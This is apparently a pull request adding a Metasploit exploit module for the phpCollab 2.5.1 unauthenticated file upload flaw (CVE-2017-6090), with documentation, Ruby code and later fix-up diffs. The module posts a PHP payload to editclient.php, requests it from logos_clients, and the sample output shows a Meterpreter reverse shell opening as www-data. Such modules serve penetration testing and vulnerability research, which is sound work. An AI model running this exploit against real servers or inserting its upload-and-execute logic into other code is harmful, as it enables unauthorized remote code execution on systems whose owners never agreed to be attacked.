### PR TITLE
Add CVE-2017-6090 phpCollab 2.5.1 file upload exploit module

### DIFF
--- a/documentation/modules/exploit/unix/webapp/phpcollab_upload_exec.md
+++ b/documentation/modules/exploit/unix/webapp/phpcollab_upload_exec.md
@@ -1,0 +1,39 @@
+## Vulnerable Application
+
+This module exploits a file upload vulnerability in phpCollab 2.5.1
+which could be abused to allow unauthenticated users to execute arbitrary code
+under the context of the web server user.
+
+The exploit has been tested on Ubuntu 16.04.3 64-bit
+
+### Vulnerable Application Installation
+
+You can download the vulnerable application from the exploit-db page [https://www.exploit-db.com/apps/dda41c5b541d7adc0b50b1fcf3bf7519-phpCollab-v2.5.1.zip]. Follow the install instructions from the phpCollab website [http://phpcollab.com/documentation/install.htm]. The phpCollab application is only compatible with php5.
+
+## Verification steps
+
+```
+msf > use exploit/unix/webapp/phpcollab_upload_exec
+msf exploit(phpcollab_upload_exec) > set RHOST [IP Address] 
+msf exploit(phpcollab_upload_exec) > set TARGETURI [Installation Directory] 
+msf exploit(phpcollab_upload_exec) > exploit 
+
+## Sample Output
+
+[*] Started reverse TCP handler on 192.168.246.129:4444 
+[*] Uploading backdoor file: 1.mEgUkeNnxP.php
+[+] Backdoor successfully created.
+[*] Triggering the exploit...
+[*] Sending stage (37543 bytes) to 192.168.246.144
+[*] Meterpreter session 1 opened (192.168.246.129:4444 -> 192.168.246.144:49264) at 2017-12-20 15:44:36 -0500
+[+] Deleted 1.mEgUkeNnxP.php
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > pwd
+/var/www/html/phpcollab/logos_clients
+meterpreter >
+
+```
+
+

--- a/modules/exploits/unix/webapp/phpcollab_upload_exec.rb
+++ b/modules/exploits/unix/webapp/phpcollab_upload_exec.rb
@@ -1,0 +1,92 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'phpCollab 2.5.1 Unauthenticated File Upload Vulnerability',
+      'Description'    => %q{
+          This module exploits a file upload vulnerability in phpCollab 2.5.1 
+        which could be abused to allow unauthenticated users to execute arbitrary code
+        under the context of the web server user.
+
+        The exploit has been tested on Ubuntu 16.04.3 64-bit
+      },
+      'Author'         =>
+        [
+          'Nicolas SERRA <n.serra[at]sysdream.com>' # Vulnerability discovery 
+          'Nick Marcoccio "1oopho1e" <iremembermodems[at]gmail.com>' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'URL', 'https://www.exploit-db.com/exploits/42934/' ],
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Payload'        =>
+        {
+          'DisableNops' => true
+        },
+      'Targets'        => [ ['Automatic', {}] ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Sep 29 2017'
+      ))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [ true, "Installed path of phpCollab ", "/phpcollab/"])
+        ])
+  end
+
+  def check
+    url = normalize_uri(target_uri.path, "general/login.php?msg=logout")
+    res = send_request_cgi(
+        'method'  => 'GET',
+        'uri'     =>  url
+    )
+
+    if res && res.body.include?('PhpCollab v2.5.1') 
+      return Exploit::CheckCode::Appears
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    filename = '1.php'
+    register_file_for_cleanup(filename)
+
+    data = Rex::MIME::Message.new
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload\"; filename=\"#{filename}\"")
+
+    print_status("Uploading backdoor file: #{filename}")
+
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, "clients/editclient.php?id=1&action=update"),
+      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
+      'data'     => data.to_s
+     })
+
+    if res && res.code == 302 
+      print_good("Backdoor successfully created.")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Error on uploading file")
+    end
+
+    print_status("Trigging the exploit...")
+    send_request_cgi({
+      'method'  => 'GET',
+      'uri'     => normalize_uri(target_uri.path, "logos_clients/1.php")
+     }, 5)
+  end
+end

--- a/modules/exploits/unix/webapp/phpcollab_upload_exec.rb
+++ b/modules/exploits/unix/webapp/phpcollab_upload_exec.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'phpCollab 2.5.1 Unauthenticated File Upload Vulnerability',
       'Description'    => %q{
-          This module exploits a file upload vulnerability in phpCollab 2.5.1 
+          This module exploits a file upload vulnerability in phpCollab 2.5.1
         which could be abused to allow unauthenticated users to execute arbitrary code
         under the context of the web server user.
 
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'Author'         =>
         [
-          'Nicolas SERRA <n.serra[at]sysdream.com>', # Vulnerability discovery 
+          'Nicolas SERRA <n.serra[at]sysdream.com>', # Vulnerability discovery
           'Nick Marcoccio "1oopho1e" <iremembermodems[at]gmail.com>', # Metasploit module
         ],
       'License'        => MSF_LICENSE,
@@ -54,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'uri'     =>  url
     )
 
-    if res && res.body.include?('PhpCollab v2.5.1') 
+    if res && res.body.include?('PhpCollab v2.5.1')
       return Exploit::CheckCode::Appears
     end
 
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'data'     => data.to_s
      })
 
-    if res && res.code == 302 
+    if res && res.code == 302
       print_good("Backdoor successfully created.")
     else
       fail_with(Failure::Unknown, "#{peer} - Error on uploading file")

--- a/modules/exploits/unix/webapp/phpcollab_upload_exec.rb
+++ b/modules/exploits/unix/webapp/phpcollab_upload_exec.rb
@@ -21,8 +21,8 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'Author'         =>
         [
-          'Nicolas SERRA <n.serra[at]sysdream.com>' # Vulnerability discovery 
-          'Nick Marcoccio "1oopho1e" <iremembermodems[at]gmail.com>' # Metasploit module
+          'Nicolas SERRA <n.serra[at]sysdream.com>', # Vulnerability discovery 
+          'Nick Marcoccio "1oopho1e" <iremembermodems[at]gmail.com>', # Metasploit module
         ],
       'License'        => MSF_LICENSE,
       'References'     =>

--- a/modules/exploits/unix/webapp/phpcollab_upload_exec.rb
+++ b/modules/exploits/unix/webapp/phpcollab_upload_exec.rb
@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'phpCollab 2.5.1 Unauthenticated File Upload Vulnerability',
+      'Name'           => 'phpCollab 2.5.1 Unauthenticated File Upload',
       'Description'    => %q{
           This module exploits a file upload vulnerability in phpCollab 2.5.1
         which could be abused to allow unauthenticated users to execute arbitrary code
@@ -27,7 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'URL', 'https://www.exploit-db.com/exploits/42934/' ],
+          [ 'EDB', '42934' ],
+          [ 'URL', 'http://www.phpcollab.com/' ],
         ],
       'Privileged'     => false,
       'Platform'       => ['php'],
@@ -62,7 +63,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    filename = '1.php'
+    filename = '1.' + rand_text_alpha(8 + rand(4)) + '.php'
+    id = File.basename(filename,File.extname(filename))
     register_file_for_cleanup(filename)
 
     data = Rex::MIME::Message.new
@@ -72,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi({
       'method'   => 'POST',
-      'uri'      => normalize_uri(target_uri.path, "clients/editclient.php?id=1&action=update"),
+      'uri'      => normalize_uri(target_uri.path, "clients/editclient.php?id=" + id + "&action=update"),
       'ctype'    => "multipart/form-data; boundary=#{data.bound}",
       'data'     => data.to_s
      })
@@ -83,10 +85,10 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Unknown, "#{peer} - Error on uploading file")
     end
 
-    print_status("Trigging the exploit...")
+    print_status("Triggering the exploit...")
     send_request_cgi({
       'method'  => 'GET',
-      'uri'     => normalize_uri(target_uri.path, "logos_clients/1.php")
+      'uri'     => normalize_uri(target_uri.path, "logos_clients/" + filename)
      }, 5)
   end
 end


### PR DESCRIPTION
Add CVE-2017-6090 phpCollab 2.5.1 file upload exploit module

## Verification
Homepage:http://www.phpcollab.com/
Github:https://github.com/phpcollab/phpcollab

Exploit-DB: https://www.exploit-db.com/exploits/42934/

1. Download vulnerable app from the exploit db page (https://www.exploit-db.com/apps/dda41c5b541d7adc0b50b1fcf3bf7519-phpCollab-v2.5.1.zip)
NOTE: phpCollab 2.5.1 would not install/work on php7, I had to use php5. 
2. Follow install instructions (http://phpcollab.com/documentation/install.htm)

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] `use exploit/unix/webapp/phpcollab_upload_exec`
- [x] `set RHOST 192.168.246.144`
- [x] `set TARGETURI /phpcollab/`
- [x] `exploit`

## Example Output
![phpcollabexploit](https://user-images.githubusercontent.com/5595174/34211104-0f1ccb6a-e566-11e7-8c9b-c3733713fbf4.png)
